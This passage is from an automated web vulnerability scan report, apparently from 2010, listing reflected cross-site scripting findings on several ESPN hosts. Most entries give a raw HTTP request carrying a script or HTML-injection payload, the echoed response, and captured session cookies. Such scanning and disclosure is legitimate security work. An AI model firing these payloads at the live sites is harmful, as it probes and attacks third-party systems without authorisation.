<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bbdd3<script>alert(1)</script>ee5a32b7b1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/ie8bbdd3<script>alert(1)</script>ee5a32b7b1a/suggestions HTTP/1.1 Host: search.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8bbdd3<script>alert(1)</script>ee5a32b7b1a/suggestions</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53445<script>alert(1)</script>6448148b6cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/ie8/suggestions53445<script>alert(1)</script>6448148b6cf HTTP/1.1 Host: search.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8/suggestions53445<script>alert(1)</script>6448148b6cf</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e04cf<script>alert(1)</script>68bc7ba9f82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriende04cf<script>alert(1)</script>68bc7ba9f82/SendToFriend</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bae5<script>alert(1)</script>2f2d8562032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn HTTP/1.1 Host: sendtofriend.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 139 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-03/04
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/sendtofriend7bae5<script>alert(1)</script>2f2d8562032/espn</BODY></HTML>
2.49. http://soccernet.espn.go.com/world-cup/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://soccernet.espn.go.com
Path: /world-cup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2757a"><script>alert(1)</script>d8f9d1d4373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /world-cup/?2757a"><script>alert(1)</script>d8f9d1d4373=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 12:56:45 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Set-Cookie: SWID=3049331C-CFBF-4614-8EC0-FF585AF6D5A9; path=/; expires=Sat, 06-Nov-2030 12:56:42 GMT; domain=.go.com; Cache-Expires: Sat, 06 Nov 2010 12:58:42 GMT Content-Length: 71086 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 16 Nov 2010 12:56:45 GMT; Path=/; Domain=.go.com Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?2757a"><script>alert(1)</script>d8f9d1d4373=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.50. http://soccernet.espn.go.com/worldcup/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://soccernet.espn.go.com
Path: /worldcup/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f969c"><script>alert(1)</script>f855b539bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /worldcup/?f969c"><script>alert(1)</script>f855b539bca=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=120 Date: Sat, 06 Nov 2010 23:04:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:04:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:06:42 GMT Content-Length: 71086 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FIFA World Cup 2010 ...[SNIP]... <a href="/worldcup/?f969c"><script>alert(1)</script>f855b539bca=1&topId=800475&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f74"><a>9d3befebb57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italyb2f74"><a>9d3befebb57 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:16:07 GMT Content-Length: 81049 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&_slug_=italyb2f74"><a>9d3befebb57&topId=792021&linktext=Lippi+takes+blame+for+Italy%27s+early+exit"> ...[SNIP]...
2.52. http://soccernet.espn.go.com/worldcup2010/team/_/team/162/italy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/162/italy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efac"><a>1119d197ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/162/italy?6efac"><a>1119d197ed9=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:14:13 GMT Content-Length: 81157 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Italy Football / So ...[SNIP]... <a href="/worldcup2010/team?team=162&6efac"><a>1119d197ed9=1&_slug_=italy&6efac"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53655"><a>809ac03abe5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain53655"><a>809ac03abe5 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:00 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:00 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:34:00 GMT Content-Length: 80715 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&_slug_=spain53655"><a>809ac03abe5&topId=808124&linktext=Andres+Iniesta+fires+Spain+to+glory"> ...[SNIP]...
2.54. http://soccernet.espn.go.com/worldcup2010/team/_/team/164/spain [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/164/spain
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99b73"><a>65c93cd4adf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/164/spain?99b73"><a>65c93cd4adf=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:16 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:16 GMT Content-Length: 80823 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Spain Football / So ...[SNIP]... <a href="/worldcup2010/team?team=164&99b73"><a>65c93cd4adf=1&_slug_=spain&99b73"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70388"><a>c589cccb3a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/202/argentina70388"><a>c589cccb3a6 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:50 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN34 Cache-Expires: Sat, 06 Nov 2010 23:12:50 GMT Content-Length: 81978 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Argentina Football ...[SNIP]... <a href="/worldcup2010/team?team=202&_slug_=argentina70388"><a>c589cccb3a6&topId=805659&linktext=Heinze+wants+Maradona+to+continue"> ...[SNIP]...
2.56. http://soccernet.espn.go.com/worldcup2010/team/_/team/202/argentina [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/202/argentina
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf5da"><a>9b858241cd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
